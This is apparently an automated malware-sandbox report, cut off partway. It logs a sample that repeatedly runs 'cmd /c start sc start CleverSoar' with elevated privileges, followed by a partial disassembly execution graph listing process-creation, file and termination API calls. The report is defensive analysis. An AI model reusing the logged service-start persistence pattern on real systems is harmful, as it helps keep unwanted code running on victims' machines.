                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:37
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:38
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:39
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:40
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:41
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:42
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:43
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:44
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:45
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:46
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:47
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:48
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:49
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:50
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:51
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:53
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:54
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:55
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:56
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:57
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:58
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:59
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:60
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7403e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:61
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:62
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:63
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:64
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:65
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:66
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:67
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:68
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:69
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:70
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:71
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:72
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:73
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:74
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:75
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:76
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:77
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:78
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:79
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:80
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:81
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:82
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:83
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:84
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:85
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:86
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:87
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:88
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:89
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:90
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:91
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:94
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:95
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:96
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:97
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7934f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:98
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:99
                            Start time:23:03:24
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:100
                            Start time:23:03:24
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:1.6%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:15.8%
                              Total number of Nodes:778
                              Total number of Limit Nodes:10
                              execution_graph 100122 6c174a27 100124 6c174a5d _strlen 100122->100124 100123 6c18639e 100254 6c2f0130 18 API calls 2 library calls 100123->100254 100124->100123 100125 6c175b6f 100124->100125 100126 6c175b58 100124->100126 100130 6c175b09 _Yarn 100124->100130 100129 6c2e6a43 std::_Facet_Register 4 API calls 100125->100129 100240 6c2e6a43 100126->100240 100129->100130 100213 6c2daec0 100130->100213 100133 6c175bad std::ios_base::_Ios_base_dtor 100133->100123 100137 6c179ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100133->100137 100219 6c2e4ff0 CreateProcessA 100133->100219 100134 6c2e6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100134->100137 100135 6c2daec0 2 API calls 100135->100137 100136 6c17a292 Sleep 100211 6c179bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 100136->100211 100137->100123 100137->100134 100137->100135 100137->100136 100155 6c17e619 100137->100155 100138 6c176624 100141 6c2e6a43 std::_Facet_Register 4 API calls 100138->100141 100139 6c17660d 100140 6c2e6a43 std::_Facet_Register 4 API calls 100139->100140 100147 6c1765bc _Yarn _strlen 100140->100147 100141->100147 100142 6c1761cb _strlen 100142->100123 100142->100138 100142->100139 100142->100147 100143 6c179bbd GetCurrentProcess TerminateProcess 100143->100137 100144 6c1863b2 100255 6c1615e0 18 API calls std::ios_base::_Ios_base_dtor 100144->100255 100146 6c1864f8 100147->100144 100148 6c176970 100147->100148 100149 6c176989 100147->100149 100152 6c176920 _Yarn 100147->100152 100150 6c2e6a43 std::_Facet_Register 4 API calls 100148->100150 100151 6c2e6a43 std::_Facet_Register 4 API calls 100149->100151 100150->100152 100151->100152 100223 6c2e5960 100152->100223 100154 6c17f243 CreateFileA 100170 6c17f2a7 100154->100170 100155->100154 100156 6c1769d6 std::ios_base::_Ios_base_dtor _strlen 100156->100123 100157 6c176dd2 100156->100157 100158 6c176dbb 100156->100158 100169 6c176d69 _Yarn _strlen 100156->100169 100161 6c2e6a43 std::_Facet_Register 4 API calls 100157->100161 100160 6c2e6a43 std::_Facet_Register 4 API calls 100158->100160 100159 6c1802ca 100160->100169 100161->100169 100162 6c177427 100164 6c2e6a43 std::_Facet_Register 4 API calls 100162->100164 100163 6c177440 100165 6c2e6a43 std::_Facet_Register 4 API calls 100163->100165 100166 6c1773da _Yarn 100164->100166 100165->100166 100167 6c2e5960 104 API calls 100166->100167 100171 6c17748d std::ios_base::_Ios_base_dtor _strlen 100167->100171 100168 6c1802ac GetCurrentProcess TerminateProcess 100168->100159 100169->100144 100169->100162 100169->100163 100169->100166 100170->100159 100170->100168 100171->100123 100172 6c177991 100171->100172 100173 6c1779a8 100171->100173 100178 6c177940 _Yarn _strlen 100171->100178 100174 6c2e6a43 std::_Facet_Register 4 API calls 100172->100174 100175 6c2e6a43 std::_Facet_Register 4 API calls 100173->100175 100174->100178 100175->100178 100176 6c177de2 100180 